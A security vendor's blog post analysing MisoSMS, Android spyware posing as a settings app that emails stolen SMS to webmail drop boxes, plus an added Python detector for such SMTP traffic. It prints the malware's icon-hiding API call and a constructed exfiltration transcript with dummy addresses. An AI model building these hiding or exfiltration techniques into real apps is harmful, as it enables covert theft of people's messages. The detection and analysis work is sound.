FireEye has uncovered and helped weaken one of the largest advanced
mobile botnets to date. The botnet, which we are dubbing “MisoSMS,” has
been used in at least 64 spyware campaigns, stealing text messages and
emailing them to cybercriminals in China.
MisoSMS infects Android systems by deploying a class of malicious
Android apps. The mobile malware masquerades as an Android settings app
used for administrative tasks. When executed, it secretly steals the
user’s personal SMS messages and emails them to a command-and-control
(CnC) infrastructure hosted in China. FireEye Mobile Threat Prevention
platform detects this class of malware as “Android.Spyware.MisoSMS.”
Here are some highlights of MisoSMS:
- We discovered 64 mobile botnet campaigns that belong to the MisoSMS malware family.
- Each of the campaigns leverages Web mail as its CnC infrastructure.
- The CnC infrastructure comprises more than 450 unique malicious email accounts.
- FireEye has been working with the community to take down the CnC infrastructure.
- The majority of the devices infected are in Korea, which leads us to
believe that this threat is active and prevalent in that region.
- The attackers logged in from Korea and mainland China, among other locations, to periodically read the stolen SMS messages.
MisoSMS is active and widespread in Korea, and we are working with
Korean law enforcement and the Chinese Web mail vendor to mitigate this
threat. This threat highlights the need for greater cross-country and
cross-organizational efforts to take down large malicious campaigns.
At the time of this blog post, all of the reported malicious email
accounts have been deactivated and we have not noticed any new email
addresses being registered by the attacker. FireEye Labs will closely
monitor this threat and continue working with relevant authorities to
mitigate it.
Technical Analysis
Once the app is installed, it presents itself as “Google Vx.” It asks
for administrative permissions on the device, which enables the malware
to hide itself from the user, as shown in Figure 2.
Once the user grants administrator privileges to the app, the app
shows the message in Figure 3, which translates to “The file is damaged
and can’t be used. Please check it on the website,” with an OK button. It then asks the user to confirm deletion, ostensibly offering the options Confirm and Cancel. If the user taps Confirm, the app sleeps for 800 milliseconds and then displays a message that says “Remove Complete.” If the user taps Cancel, the app still displays the “Remove Complete” message; nothing is actually removed.
In either case, the following API call is made to hide the app from the user. It disables the app’s own launcher activity (the new state 2 is PackageManager.COMPONENT_ENABLED_STATE_DISABLED) without killing the process (flag 1 is PackageManager.DONT_KILL_APP), so the icon disappears from the launcher while the malicious code keeps running:

// Disable this activity (the launcher entry) so it no longer appears in the app drawer
MainActivity.this.getPackageManager().setComponentEnabledSetting(
        MainActivity.this.getComponentName(),
        2,   // PackageManager.COMPONENT_ENABLED_STATE_DISABLED
        1);  // PackageManager.DONT_KILL_APP: keep the process alive
This application exfiltrates the SMS messages in a distinctive way. Some
SMS-stealing malware sends the contents of users’ SMS messages by
forwarding them over SMS to phone numbers under the attacker’s
control. Others send the stolen SMS messages to a CnC server over TCP
connections. This malicious app, by contrast, sends the stolen SMS
messages to the attacker’s email address over an SMTP connection to a
Web mail provider. A South Korean company described a similar SMTP-based
exfiltration technique in its blog.

Most of the MisoSMS-based apps we discovered had no or very few vendor detections on VirusTotal. Visit http://www.fireeye.com/blog/technical/botnet-activities-research/2013/12/misosms.html to read more.
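The SMTP exfiltration path is the part of this behaviour a network defender can actually observe, so here is an added example, not FireEye’s code and not taken from the malware, that parses a captured outbound SMTP session from a handset and flags it when the message body looks like relayed SMS records. The transcript, the mailbox names, the domain `example-webmail.cn` and the one-record-per-line layout (number|timestamp|text) are constructed assumptions; the post does not give MisoSMS’s real message format.

```python
"""
Added example, not FireEye's code: parse a captured outbound SMTP
session from a handset and flag it when the message body looks like
relayed SMS records. The transcript, the mailbox names, the domain
and the record layout (number|timestamp|text) are all constructed
for illustration; MisoSMS's real message format is not given above.
"""
import re
from email import message_from_string

# Constructed transcript: "S:" lines come from the webmail SMTP server,
# "C:" lines from the infected handset. Credentials are dummy values.
SESSION = """\
S: 220 smtp.example-webmail.cn ESMTP ready
C: EHLO android-1234
S: 250-smtp.example-webmail.cn
S: 250 AUTH LOGIN PLAIN
C: AUTH PLAIN AGRyb3Bib3gwMQBwYXNzd29yZDE=
S: 235 Authentication successful
C: MAIL FROM:<dropbox01@example-webmail.cn>
S: 250 OK
C: RCPT TO:<collector07@example-webmail.cn>
S: 250 OK
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: From: dropbox01@example-webmail.cn
C: To: collector07@example-webmail.cn
C: Subject: 01012345678
C:
C: +821012345678|2013-12-10 09:14:22|Your verification code is 482913
C: +821098765432|2013-12-10 09:20:01|Are you coming tonight?
C: .
S: 250 OK queued
C: QUIT
S: 221 Bye
"""

# Assumed layout, one stolen SMS per body line: <number>|<YYYY-MM-DD HH:MM:SS>|<text>
RECORD_RE = re.compile(
    r"^(\+?\d[\d\-]{6,}\d)\|(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\|(.+)$")


def parse_session(transcript):
    """Return (envelope sender, envelope recipient, raw RFC 5322 message)."""
    mail_from = rcpt_to = None
    body, in_data = [], False
    for raw in transcript.splitlines():
        side, line = raw[:2], raw[3:]          # "C:"/"S:" prefix, then the wire text
        if side != "C:":
            continue                           # only the client's side matters here
        if in_data:
            if line == ".":                    # end-of-data marker
                in_data = False
            else:                              # undo SMTP dot-stuffing
                body.append(line[1:] if line.startswith("..") else line)
            continue
        verb = line.upper()
        if verb.startswith("MAIL FROM:"):
            mail_from = line[len("MAIL FROM:"):].strip(" <>")
        elif verb.startswith("RCPT TO:"):
            rcpt_to = line[len("RCPT TO:"):].strip(" <>")
        elif verb == "DATA":
            in_data = True
    return mail_from, rcpt_to, "\n".join(body)


def extract_sms_records(raw_message):
    """Pull SMS-like records out of the message body, ignoring headers."""
    payload = message_from_string(raw_message).get_payload()
    records = []
    for line in payload.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append({"number": m.group(1), "time": m.group(2), "text": m.group(3)})
    return records


def classify_session(transcript, webmail_domains=("example-webmail.cn",)):
    """Flag a session whose body carries SMS records; list corroborating signals."""
    mail_from, rcpt_to, raw = parse_session(transcript)
    records = extract_sms_records(raw)
    reasons = []
    if records:
        reasons.append("%d SMS-like record(s) in message body" % len(records))
    if rcpt_to and rcpt_to.rsplit("@", 1)[-1] in webmail_domains:
        reasons.append("recipient mailbox is on a webmail domain (possible drop box)")
    if mail_from and rcpt_to and mail_from != rcpt_to and \
            mail_from.rsplit("@", 1)[-1] == rcpt_to.rsplit("@", 1)[-1]:
        reasons.append("sender and recipient share one webmail domain")
    return {"from": mail_from, "to": rcpt_to, "records": records,
            "suspicious": bool(records), "reasons": reasons}


if __name__ == "__main__":
    verdict = classify_session(SESSION)
    print("suspicious:", verdict["suspicious"])
    for reason in verdict["reasons"]:
        print(" -", reason)
    for rec in verdict["records"]:
        print(" ", rec["time"], rec["number"], rec["text"])
```

Run it as a script to print the verdict. The body-format match is the deciding signal; the recipient-domain checks only corroborate, because legitimate mail clients on a handset also speak SMTP to webmail providers, and the domain list would be keyed to the providers actually involved. On a real network the session would first have to be decrypted or captured before TLS, since webmail SMTP normally runs over STARTTLS or port 465.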